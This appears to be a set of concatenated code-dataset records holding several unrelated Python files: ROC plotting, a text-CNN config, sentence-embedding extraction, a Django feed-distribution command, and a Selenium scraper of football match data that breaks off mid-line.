ax.plot(coords[:,0],coords[:,1])\r\n ax.plot([0,100],[0,100],color = 'gray',linestyle=':')\r\n # # add contamination label\r\n # for i in range(1,len(TPR)-1):\r\n # ax.text(coords[i,0],coords[i,1],coords_sorted['contaminations'][i])\r\n ax.set_xlim(-5,105)\r\n ax.set_ylim(-5,105)\r\n ax.set_xlabel('FPR(%)')\r\n ax.set_ylabel('TPR(%)')\r\n ax.set_title('{} with {} distance'.format(aa,d_measure))\r\n # fig.set_tight_layout('tight')\r\n fig.suptitle('{}'.format(exp_names[e]))\r\n plt.show()\r\n\r\n\r\n# plot overlay plots\r\nfor e,experiment in enumerate(exp_list):\r\n plt.figure()\r\n # fig,axes = plt.subplots(2,2,sharex='all', sharey='all')\r\n for d,d_measure in enumerate(dist_measures):\r\n for a,aa in enumerate(algorithms):\r\n TPR = df.loc[algorithms[a]][experiments[norm_exp_index]][dist_measures[d]][rates[1]]\r\n FPR = df.loc[algorithms[a]][experiment][dist_measures[d]][rates[1]]\r\n contams = list(TPR.index)\r\n \r\n TPR = list(TPR)\r\n FPR = list(FPR)\r\n # add starting and ending BCs\r\n TPR.insert(0,0)\r\n TPR.append(100)\r\n FPR.insert(0,0)\r\n FPR.append(100)\r\n contams.insert(0,0)\r\n contams.append(100)\r\n \r\n # coordinate array\r\n coords = np.array([FPR,TPR,contams],dtype=float).T\r\n \r\n # sort with numpy using structured array\r\n dtype = [('FPR',float),('TPR',float),('contamination',float)]\r\n coords_struct = np.empty(len(TPR),dtype)\r\n coords_struct['TPR'] = TPR\r\n coords_struct['FPR'] = FPR\r\n coords_struct['contamination'] = contams\r\n coords_struct.sort(order='FPR')\r\n \r\n # plot\r\n \r\n plt.scatter(coords_struct['FPR'],coords_struct['TPR'],\r\n label='{} with {} distance'.format(aa,d_measure))\r\n plt.plot(coords_struct['FPR'],coords_struct['TPR'])\r\n \r\n plt.plot([0,100],[0,100],color = 'gray',linestyle=':')\r\n # # add contamination label\r\n # for i in range(1,len(TPR)-1):\r\n # ax.text(coords[i,0],coords[i,1],coords_sorted['contaminations'][i])\r\n \r\n # ax.set_title('{} with {} distance'.format(aa,d_measure))\r\n plt.xlim(-5,105)\r\n plt.ylim(-5,105)\r\n plt.xlabel('FPR(%)')\r\n plt.ylabel('TPR(%)')\r\n plt.title('{}'.format(exp_names[e]))\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\n\r\n# plot subplots of overlay plots \r\nfig,axes = plt.subplots(3,2,sharex='all', sharey='all')\r\nfor e,experiment in enumerate(exp_list):\r\n for d,d_measure in enumerate(dist_measures):\r\n for a,aa in enumerate(algorithms):\r\n TPR = df.loc[algorithms[a]][experiments[norm_exp_index]][dist_measures[d]][rates[1]]\r\n FPR = df.loc[algorithms[a]][experiment][dist_measures[d]][rates[1]]\r\n contams = list(TPR.index)\r\n \r\n TPR = list(TPR)\r\n FPR = list(FPR)\r\n # add starting and ending BCs\r\n TPR.insert(0,0)\r\n TPR.append(100)\r\n FPR.insert(0,0)\r\n FPR.append(100)\r\n contams.insert(0,0)\r\n contams.append(100)\r\n \r\n # coordinate array\r\n coords = np.array([FPR,TPR,contams],dtype=float).T\r\n \r\n # sort with numpy using structured array\r\n dtype = [('FPR',float),('TPR',float),('contamination',float)]\r\n coords_struct = np.empty(len(TPR),dtype)\r\n coords_struct['TPR'] = TPR\r\n coords_struct['FPR'] = FPR\r\n coords_struct['contamination'] = contams\r\n coords_struct.sort(order='FPR')\r\n \r\n # plot\r\n ax = axes.reshape(6,)[e]\r\n ax.scatter(coords_struct['FPR'],coords_struct['TPR'],\r\n label='{} with {} distance'.format(aa,d_measure))\r\n ax.plot(coords_struct['FPR'],coords_struct['TPR'])\r\n # ax.plot(coords[:,0],coords[:,1])\r\n ax.plot([0,100],[0,100],color = 'gray',linestyle=':')\r\n # # add contamination label\r\n # for i in range(1,len(TPR)-1):\r\n # ax.text(coords[i,0],coords[i,1],coords_sorted['contaminations'][i])\r\n \r\n # fig.set_tight_layout('tight')\r\n ax.set_xlim(-5,105)\r\n ax.set_ylim(-5,105)\r\n if e in [4,5]: ax.set_xlabel('FPR(%)')\r\n ax.set_ylabel('TPR(%)')\r\n ax.set_title('{}'.format(exp_names[e]))\r\n if e==1: ax.legend()\r\n# plt.legend(loc = 'best') # bbox (x, y, width, height)\r\n# fig.suptitle('AUROC')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"plot_results_3room.py","file_name":"plot_results_3room.py","file_ext":"py","file_size_in_byte":12466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"549495404","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2019/1/9 15:02\n@Author : Zhangyu\n@Email : zhangycqupt@163.com\n@File : config.py\n@Software: PyCharm\n@Github : zhangyuo\n\"\"\"\n\n# train data\nTRAIN_DATA_PATH_NEG = '../data/rt-polaritydata/rt-polarity.neg'\nTRAIN_DATA_PATH_POS = '../data/rt-polaritydata/rt-polarity.pos'\n# test data\nTEST_DATA_PATH_NEG = '../data/test_data/rt-polarity.neg'\nTEST_DATA_PATH_POS = '../data/test_data/rt-polarity.pos'\n\n# model Hyperparameters\n# percentage of the training data to use for validation\ndev_sample_percentage = 0.1\n# dropout keep_prob\ndropout = 0.5\n# word embedding dim\nembedding_dim = 256\n# comma-separated filter sizes\nfilter_sizes = 3, 4, 5\n# number of filters per filter size\nnum_filters = 128\n# l2 regularization lambda\nl2_reg_lambda = 0.5\n# Adam/Adadelta/Adagrad/RMSProp/Momentum/SGD\noptimizer = \"Adam\"\n# learning rate\nlr = 1e-3\n# gradient clipping\ngrad_clip = 5.0\n\n# training parameters\n# number of checkpoints to store\nnum_checkpoints = 5\n# batch Size\nbatch_size = 128\n# number of training epochs\nnum_epochs = 200\n# evaluate model on dev set after this many steps\nevaluate_every = 100\n# save model after this many steps\ncheckpoint_every = 100\n","sub_path":"config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"436129855","text":"import time, sys, pickle\nfrom multiprocessing import Value\nimport numpy as np\nfrom math import ceil\nimport concurrent.futures\nimport tensorflow as tf\nimport tensorflow_hub as hub\n\nUSE_folder = \"/home/vlead/USE\"\nembeds, words = [], []\ndef extractUSEEmbeddings(words):\n\n embed = hub.KerasLayer(USE_folder)\n word_embeddings = embed(words)\n return word_embeddings.numpy()\n\ndef compare_sim(word_to_compare):\n global embeds, words\n max_sim = -1000\n closest_word = \"\"\n for i,w in enumerate(embeds):\n sim = np.dot(word_to_compare, w)\n if sim > max_sim:\n max_sim = sim\n closest_word = words[i]\n print (\"Original word: \", word, \"Closest Word: \", closest_word, \"Sim: \", max_sim)\n return (closest_word, max_sim)\n\ndef run():\n global embeds, words\n f = open(\"../junk/failed_words\", \"rb\") \n failed, words = pickle.load(f)\n\n len_part = 10000\n n_parts = ceil(len(words)/len_part)\n closest_word = \"\"\n embeds = []\n for i in range(n_parts):\n print (float(i*100/n_parts))\n words_part = words[i*len_part:(i+1)*len_part]\n embeds.append(extractUSEEmbeddings(words_part))\n\n f = open(\"../junk/use_embeddings\", \"wb\")\n pickle.dump(embeds, f)\n\n resolved = dict()\n with concurrent.futures.ProcessPoolExecutor() as executor:\n for res in executor.map(compare_sim, failed):\n resolved[res[0]] = (res[1], res[2])\n\n f = open(\"../junk/use_resolved\", \"wb\")\n pickle.dump(resolved, f)\n return\n\nif __name__ == \"__main__\": \n run()\n","sub_path":"OntoEnricher/src/extract_use_embeddings.py","file_name":"extract_use_embeddings.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"330708696","text":"#coding=utf-8\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\nfrom main.models import Item, KeyValue, Channel, Channel_Source, Channel_Feed\nimport urlparse\nfrom datetime import datetime, timedelta\nfrom multidb.pinning import use_master\nfrom django.core.cache import cache\n\nclass Command(BaseCommand):\n \"\"\"\n Distribute items from recent week for both popular and recent news \n While this process is running, it should not disrupt the ranking abruptly \n Purge news that are not with 7 days and that is lower than min_share_count from Channel_Feed\n Should be called after crawl_feed.py\n \"\"\"\n args = ''\n help = 'no args'\n\n @use_master\n def handle(self, *args, **options):\n self.stdout.write('Start distributing items\\n')\n distribute_channel_feed() \n self.stdout.write('Finished distributing items\\n')\n\n\ndef distribute_channel_feed():\n channel_sources = Channel_Source.objects.filter(enabled=True)\n source_dict = {} # A dictionary of lists\n for cs in channel_sources:\n if cs.source in source_dict:\n source_dict[cs.source].append(cs.channel_id)\n else:\n source_dict[cs.source] = [cs.channel_id]\n \n \n min_count_dict = {}\n channels = Channel.objects.all()\n for c in channels:\n min_count_dict[c.id] = c.min_share_count\n \n time_ago = datetime.now() - timedelta(days=3)\n items = Item.objects.filter(create_date__gte=time_ago)\n for item in items:\n item_source = get_source(item.url)\n if item.channels or item_source in source_dict :\n if item.channels:\n channel_ids = [int(x) for x in item.channels.split(',')]\n else:\n channel_ids = source_dict[item_source] # a list of channel ids\n item.channels = ','.join([str(x) for x in channel_ids])\n item.save() #save for next time reference\n for channel_id in channel_ids: #distribute to different channels if passing min_share_count of that channel\n if item.share_count + item.sina_count >= min_count_dict[channel_id]:\n try:\n channel_feed = Channel_Feed.objects.get(channel__pk=channel_id, item__pk=item.id)\n except: #Does not exist, create new\n channel_feed = Channel_Feed()\n channel_feed.channel_id = channel_id\n channel_feed.item_id = item.id\n channel_feed.create_date = item.create_date\n \n #For new ones:fill in the cout; For existing ones: update the count\n channel_feed.share_count = item.share_count\n channel_feed.sina_count = item.sina_count\n channel_feed.save() \n \n #First stage: Clean up feeds in channels that are some days ago\n #Second Stage:Clean up feeds that isn't within top 100\n for c in channels:\n channel_feeds = Channel_Feed.objects.filter(channel__pk=c.id)\n for channel_feed in channel_feeds:\n if channel_feed.create_date < time_ago:\n #!!! BE CAREFUL HERE. It's fine to delete it now since we don't show channel feed\n # but instead use Item model; If we use redundant info in channel_feed later, then \n # it's likely user clicks on an item but gets 500 error!\n channel_feed.delete()\n \n channel_feeds = Channel_Feed.objects.filter(channel__pk=c.id).order_by('sina_count', 'share_count')\n if channel_feeds:\n cf = channel_feeds[0]\n if len(channel_feeds) < 100: #set a lower threshold to allow more items\n c.min_share_count = (cf.share_count + cf.sina_count)/10\n else:\n c.min_share_count = cf.share_count + cf.sina_count\n c.save()\n \ndef get_source(url):\n parts = urlparse.urlparse(url)\n return parts.netloc.lstrip('www.')","sub_path":"main/management/commands/distribute_channel_feed.py","file_name":"distribute_channel_feed.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"444586734","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.firefox.options import Options\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nimport csv, os, time\n\nfrom datetime import timedelta, date, datetime\nstart_date = date(2014, 1, 1)\nend_date = date(2018, 6, 1)\nacceptTournaments = set()\ntournamentSelectorOn = True\n#matches = []\ncurrentTime = time.strftime(\"%Y-%m-%d_%Hh%Mm%Ss\")\nfileName = str(start_date.year)+\"-\"+str(start_date.month)+\"_\"+str(end_date.year)+\"-\"+str(end_date.month)+\"_curr\"+currentTime\n\nmistakeNum = 0\n\"\"\"\noptions = Options()\noptions.set_headless(headless=True)\ndriver = webdriver.Firefox(firefox_options=options)\n\"\"\"\ndriver = webdriver.Firefox()\n#actions = ActionChains(driver)\ndef daterange(start_date, end_date):\n for n in range(int ((end_date - start_date).days)):\n yield start_date + timedelta(n)\n\ndef gIHTML(item):\n\treturn item.get_attribute('innerHTML')\n\nwith open('tournamentFinal.csv') as csvfile:\n\trowreader = csv.reader(csvfile)\n\tfor row in rowreader:\n\t\tacceptTournaments.add(row[0])\n\nwith open(\"{0}.csv\".format(fileName), \"w\") as csv_file:\n\twriter1 = csv.writer(csv_file)\n\twriter1.writerow([\"Event Name\",\"Date\",\t\"Home team\", \"Away team\", \"Halftime\", \"Fulltime\", \"Overtime\", \"Extratime\", \"Home team scores [Scorer name, minute]\", \"Away team scores [Scorer name, minute]\",\t\"Home team Penalty Shots [Penalty shooter name, Minute‚ Bool(Shot made)]\",\t\n\t\t\"Away team Penalty Shots [Penalty shooter name, Minute, Bool(Shot made)]\",\t\"Home Overtime [Bool(Shot made), Order]\", \"Away Overtime [Bool(Shot made), Order]\", \"Home Redcard [Red Cardee Name, Minute, Reason]\", \"Home Redcard [Red Cardee Name, Minute, Reason]\",\t\"Home Past 5 Games\", \"Home Past 5 Games Total\", \"Score Away Past 5 Games\", \"Away Past 5 Games Total Score\", \"Home Manager\", \"Away Manager\",\t\n\t\t\"Referee\", \"Referee Avg Yellow cards\", \"Referee Avg Red Cards\", \"Location\", \"Venue\", \"Attendance\"])\n#\ttry:\n\t#print(\"Opened writer!\")\n\tfor date in daterange(start_date, end_date):\n\t\ttry:\n\t\t\tdriver.get(\"https://www.sofascore.com/football/{0}-{1}-{2}\".format(date.year,str(date.month).zfill(2),str(date.day).zfill(2)))\n\t\t\tWebDriverWait(driver, 15).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".event-list\")))\n\t\t\ttournaments = driver.find_elements_by_class_name('tournament')\n\t\t\t#print(\"****************************** \" + date.strftime(\"%Y-%m-%d\") + \" ******************************\")\n\t\t\tfor elem in tournaments:\n\t\t\t\tname = None\n\t\t\t\tcategory = None\n\t\t\t\t#print(\"Starting new League\")\n\t\t\t\tname = elem.find_elements_by_xpath('.//span[@class=\"tournament__name\"]')\n\t\t\t\tcategory = elem.find_elements_by_xpath('.//span[@class=\"tournament__category\"]')\n\t\t\t\tif len(name)>0:\n\t\t\t\t\teventName = category[0].text.strip()+\" \"+ name[0].text.strip()\n\t\t\t\t\tif eventName in acceptTournaments:\n\t\t\t\t\t\tprint(\"Event in tournament:\", eventName)\n\t\t\t\t\t\t#print(\"**************************************************************\"+eventName)\n\t\t\t\t\t\t#print(\"............\",category[0].text.strip(), name[0].text.strip(), \"............\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tmatchLink = elem.find_elements_by_xpath('.//div[@class=\"js-event-list-tournament-events\"]/a')\n\t\t\t\t\t\tfor matchup in matchLink:\n\t\t\t\t\t\t\t#versus = None\n\t\t\t\t\t\t\tmatchHome = None\n\t\t\t\t\t\t\tmatchAway = None\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tnoIncidentData = False\n\t\t\t\t\t\t\theaderContainer = \"\"\n\n\t\t\t\t\t\t\thalfScore = \"\"\n\t\t\t\t\t\t\tfinalScore = \"\"\n\t\t\t\t\t\t\toverScore = \"\"\n\t\t\t\t\t\t\textraScore = \"\"\n\n\t\t\t\t\t\t\tawayScore = []\n\t\t\t\t\t\t\thomeScore = []\n\t\t\t\t\t\t\tawayPenalty = []\n\t\t\t\t\t\t\thomePenalty = []\n\t\t\t\t\t\t\tawayOverTime = []\n\t\t\t\t\t\t\thomeOverTime = []\n\t\t\t\t\t\t\tawayRedCards = []\n\t\t\t\t\t\t\thomeRedCards = []\n\n\t\t\t\t\t\t\thomePast5Games = []\n\t\t\t\t\t\t\thomePast5GamesTotalScore = \"\"\n\t\t\t\t\t\t\tawayPast5Games = []\n\t\t\t\t\t\t\tawayPast5GamesTotalScore = \"\"\n\n\t\t\t\t\t\t\thomeManager = \"\"\n\t\t\t\t\t\t\tawayManager = \"\"\n\n\t\t\t\t\t\t\tmatchReferee=\"\"\n\t\t\t\t\t\t\trefAvgYellowCards = \"\"\n\t\t\t\t\t\t\trefAvgRedCards = \"\"\n\t\t\t\t\t\t\tmatchLocation = \"\"\n\t\t\t\t\t\t\tmatchVenue = \"\"\n\t\t\t\t\t\t\tmatchAttendence = \"\"\n\n\t\t\t\t\t\t\t#versus = matchup.find_elements_by_xpath('.//div[@class=\"cell__section--main \"]/div')\n\t\t\t\t\t\t\tmatchHome= gIHTML(matchup.find_elements_by_xpath('.//div[@class=\"cell__section--main \"]/div')[0]).strip()\n\t\t\t\t\t\t\tmatchAway = gIHTML(matchup.find_elements_by_xpath('.//div[@class=\"cell__section--main \"]/div')[1]).strip()\n\t\t\t\t\t\t\t#print(matchHome, \"Vs. \", matchAway)\n\t\t\t\t\t\t\tif matchHome.find(\"-1:\n\t\t\t\t\t\t\t\tmatchHome = matchHome[:matchHome.find(\"-1:\n\t\t\t\t\t\t\t\tmatchAway = matchAway[:matchAway.find(\"0:\n\t\t\t\t\t\t\t\t\t\t#print(\"isAway\")\n\t\t\t\t\t\t\t\t\t\tisAway = True\n\n\t\t\t\t\t\t\t\t\tif len(goals)>0:\n\t\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\t\tscorer = elem.find_element_by_xpath('.//span[@class=\"incident__scorer\"]/a')\n\t\t\t\t\t\t\t\t\t\t\tscorerName = scorer.get_attribute('data-player-name')\n\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\t#print(gIHTML(elem.find_element_by_xpath('.//span[@class=\"incident__scorer\"]')))\n\t\t\t\t\t\t\t\t\t\t\tscorer = elem.find_elements_by_xpath('.//span[@class=\"incident__scorer\"]/span')\n\t\t\t\t\t\t\t\t\t\t\tif len(scorer)==0:\n\t\t\t\t\t\t\t\t\t\t\t\tscorerName = \"N/A\"\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\tscorerName = scorer[0].get_attribute('data-player-name')\n\t\t\t\t\t\t\t\t\t\tscorerTime = gIHTML(elem.find_element_by_xpath('.//div[@class=\"cell__content incident__time\"]')).strip()\n\t\t\t\t\t\t\t\t\t\tif scorerTime.find('')>-1:\n\t\t\t\t\t\t\t\t\t\t\tscorerTime = scorerTime.replace('','').replace('','')\n\t\t\t\t\t\t\t\t\t\t#print(scorerTime)\n\t\t\t\t\t\t\t\t\t\tif isAway == True:\n\t\t\t\t\t\t\t\t\t\t\tawayScore.append([scorerName, scorerTime])\n\t\t\t\t\t\t\t\t\t\telse: \n\t\t\t\t\t\t\t\t\t\t\thomeScore.append([scorerName, scorerTime])\n\t\t\t\t\t\t\t\t\telif len(penalties)>0:\n\t\t\t\t\t\t\t\t\t\tpenaltyScorerTime = gIHTML(elem.find_element_by_xpath('.//div[@class=\"cell__content incident__time\"]')).strip()\n\t\t\t\t\t\t\t\t\t\t#print(penaltyScorerTime)\n\t\t\t\t\t\t\t\t\t\tif penaltyScorerTime.find('')>-1:\n\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerTime = penaltyScorerTime.replace('','').replace('','')\n\t\t\t\t\t\t\t\t\t\tif penaltyScorerTime != '-':\n\t\t\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = elem.find_element_by_xpath('.//span[@class=\"incident__scorer\"]/a')\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = penaltyScorer.get_attribute('data-player-name')\n\t\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorer = elem.find_elements_by_xpath('.//span[@class=\"incident__scorer\"]/span')\n\t\t\t\t\t\t\t\t\t\t\t\tif len(penaltyScorer)==0:\n\t\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = \"N/A\"\n\t\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = penaltyScorer[0].get_attribute('data-player-name')\n\t\t\t\t\t\t\t\t\t\t\tif isAway ==True: \n\t\t\t\t\t\t\t\t\t\t\t\tawayPenalty.append([penaltyScorerName, penaltyScorerTime, True])\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\thomePenalty.append([penaltyScorerName, penaltyScorerTime, True])\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tif isAway ==True:\n\t\t\t\t\t\t\t\t\t\t\t\tawayOverTime.append([True, penaltyOrder+1])\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyOrder+=1\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\thomeOverTime.append([True, penaltyOrder+1])\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyOrder+=1\n\t\t\t\t\t\t\t\t\telif len(missedPenalties) > 0:\n\t\t\t\t\t\t\t\t\t\tpenaltyScorerTime = gIHTML(elem.find_element_by_xpath('.//div[@class=\"cell__content incident__time\"]')).strip()\n\t\t\t\t\t\t\t\t\t\tif penaltyScorerTime.find('')>-1:\n\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerTime = penaltyScorerTime.replace('','').replace('','')\n\t\t\t\t\t\t\t\t\t\tif penaltyScorerTime != '-':\n\t\t\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = gIHTML(elem.find_element_by_xpath('.//div[@class=\"cell__content\"]//a')).strip()\n\t\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = elem.find_element_by_xpath('.//span').text\n\t\t\t\t\t\t\t\t\t\t\tif isAway ==True: \n\t\t\t\t\t\t\t\t\t\t\t\tawayPenalty.append([penaltyScorerName, penaltyScorerTime, False])\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\thomePenalty.append([penaltyScorerName, penaltyScorerTime, False])\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tif isAway == True:\n\t\t\t\t\t\t\t\t\t\t\t\tawayOverTime.append([False, penaltyOrder+1])\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyOrder+=1\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\thomeOverTime.append([False, penaltyOrder+1])\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyOrder+=1\n\t\t\t\t\t\t\t\t\telif len(redCards)>0:\n\t\t\t\t\t\t\t\t\t\ttry: \n\t\t\t\t\t\t\t\t\t\t\tredCardTime = gIHTML(elem.find_element_by_xpath('.//div[@class=\"cell__content incident__time\"]')).strip()\n\t\t\t\t\t\t\t\t\t\t\tif redCardTime.find('')>-1:\n\t\t\t\t\t\t\t\t\t\t\t\tredCardTime = redCardTime.replace('','').replace('','')\n\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\tredCardTime = \"OT\"\n\t\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\t\tredCarder = elem.find_element_by_xpath('.//div[@class=\"cell__content h4\"]/a')\n\t\t\t\t\t\t\t\t\t\t\tredCarderName = redCarder.get_attribute('data-player-name')\n\t\t\t\t\t\t\t\t\t\t\tif len(redCarderName) == 0:\n\t\t\t\t\t\t\t\t\t\t\t\tredCarderName = \"N/A\"\n\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\t#print(\"Red card exception\")\n\t\t\t\t\t\t\t\t\t\t\tredCarder = elem.find_element_by_xpath('.//span')\n\t\t\t\t\t\t\t\t\t\t\tredCarderName = redCarder.text\n\t\t\t\t\t\t\t\t\t\t\tif len(redCarderName)==0:\n\t\t\t\t\t\t\t\t\t\t\t\tredCarderName = \"N/A\"\n\t\t\t\t\t\t\t\t\t\ttry: \n\t\t\t\t\t\t\t\t\t\t\tredCardReason = gIHTML(elem.find_element_by_xpath('.//span[@class=\"incident__dim\"]')).strip()\n\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\tif len(elem.find_elements_by_xpath('.//div[@title = \"2nd Yellow card (Red)\"]'))>0:\n\t\t\t\t\t\t\t\t\t\t\t\tredCardReason = \"2nd Yellow card\"\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\tredCardReason = \"N/A\"\n\t\t\t\t\t\t\t\t\t\tif isAway==True:\n\t\t\t\t\t\t\t\t\t\t\tawayRedCards.append([redCarderName, redCardTime, redCardReason])\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\thomeRedCards.append([redCarderName, redCardTime, redCardReason])\n\t\t\t\t\t\t\t\t#print(homeScore, awayScore, homePenalty, awayPenalty, homeOverTime, awayOverTime, homeRedCards, awayRedCards)\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t#print(\"Scraping small data\")\n\t\t\t\t\t\t\t\t\theaderContainer = driver.find_element_by_xpath('.//div[@class=\"js-event-widget-header-container\"]//div[@class=\"cell__section--main u-tC\"]')\n\t\t\t\t\t\t\t\t\tprint(headerContainer)\n\t\t\t\t\t\t\t\t\tfinalScore = headerContainer.find_element_by_xpath('./div[@class=\"cell__content u-pT8\"]/span').text\n\t\t\t\t\t\t\t\t\tprint(finalScore)\n\t\t\t\t\t\t\t\t\thalfScore = headerContainer.find_elements_by_xpath('./div[@class=\"cell__content\"]/span[@class=\"u-t2 u-t16\"]')\n\t\t\t\t\t\t\t\t\tif len(halfScore)==0:\n\t\t\t\t\t\t\t\t\t\tprint(\"No halfscore!\")\n\t\t\t\t\t\t\t\t\t\thalfScore = \"N/A\"\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\thalfScore = halfScore[0].text[1:-1]\n\t\t\t\t\t\t\t\t\t#print(finalScore, halfScore)\n\n\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\tprint(\"No data found\")\n\t\t\t\t\t\t\t\t\tcontinue\n\n\n\t\t\t\t\t\t\tpGameForm = contentContainer.find_elements_by_xpath('.//div[@class=\"js-widget-teams-form widget-teams-form\"]/div')\n\t\t\t\t\t\t\tif len(pGameForm)==3:\n\t\t\t\t\t\t\t\tPGameForm1 = pGameForm[1]\n\t\t\t\t\t\t\t\tPGameForm2 = pGameForm[2]\n\t\t\t\t\t\t\t\tname1 = gIHTML(PGameForm1.find_element_by_xpath('.//div[@class=\"cell__content standings__team-name\"]')).strip()\n\t\t\t\t\t\t\t\tname2 = gIHTML(PGameForm2.find_element_by_xpath('.//div[@class=\"cell__content standings__team-name\"]')).strip()\n\t\t\t\t\t\t\t\tpast5Games1 = PGameForm1.find_elements_by_xpath('.//div[@class=\"cell__section standings__last-5\"]/div/span')\n\t\t\t\t\t\t\t\tpast5Games1Result = []\n\t\t\t\t\t\t\t\tfor item in past5Games1:\n\t\t\t\t\t\t\t\t\ttext = item.get_attribute('class')\n\t\t\t\t\t\t\t\t\tpast5Games1Result.append(text[text.find('-')+1:])\n\t\t\t\t\t\t\t\tpast5Games2 = PGameForm2.find_elements_by_xpath('.//div[@class=\"cell__section standings__last-5\"]/div/span')\n\t\t\t\t\t\t\t\tpast5Games2Result = []\n\t\t\t\t\t\t\t\tfor item in past5Games2:\n\t\t\t\t\t\t\t\t\ttext = item.get_attribute('class')\n\t\t\t\t\t\t\t\t\tpast5Games2Result.append(text[text.find('-')+1:])\n\t\t\t\t\t\t\t\tscore1 = gIHTML(PGameForm1.find_element_by_xpath('.//div[@class=\"cell__section standings__points\"]/div')).strip()\n\t\t\t\t\t\t\t\tscore2 = gIHTML(PGameForm2.find_element_by_xpath('.//div[@class=\"cell__section standings__points\"]/div')).strip()\n\t\t\t\t\t\t\t\tif matchHome.find(name1)>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\t#print(matchHome, name1)\n\t\t\t\t\t\t\t\telif matchAway.find(name1)>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\t#print(matchAway, name1)\n\t\t\t\t\t\t\t\telif matchHome.find(name2)>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\t#print(matchHome, name2)\n\t\t\t\t\t\t\t\telif matchAway.find(name2)>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\t#print(matchAway, name2)\n\t\t\t\t\t\t\t\telif matchHome.find(name1[:2])>-1 and matchAway.find(name2[:2])>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = 